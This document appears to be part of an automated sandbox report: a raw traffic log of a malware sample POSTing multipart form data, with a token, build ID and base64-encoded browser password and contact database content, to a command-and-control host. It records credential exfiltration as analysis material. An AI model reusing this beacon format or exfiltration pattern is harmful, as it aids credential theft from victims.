                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:51 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      16192.168.2.449768159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:51 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GDBS0R1VAI5F3EKN7Y5F
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 55081
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------GDBS0R1VAI5F3EKN7Y5FContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------GDBS0R1VAI5F3EKN7Y5FContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------GDBS0R1VAI5F3EKN7Y5FCont
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:51 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:53 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      17192.168.2.449775159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:53 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 142457
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:55 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      18192.168.2.449776159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:54 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:54 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                      2024-12-04 16:04:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:55 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      19192.168.2.449782159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:58 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DBAI5X4OZU3EUASRQ16P
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 169765
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
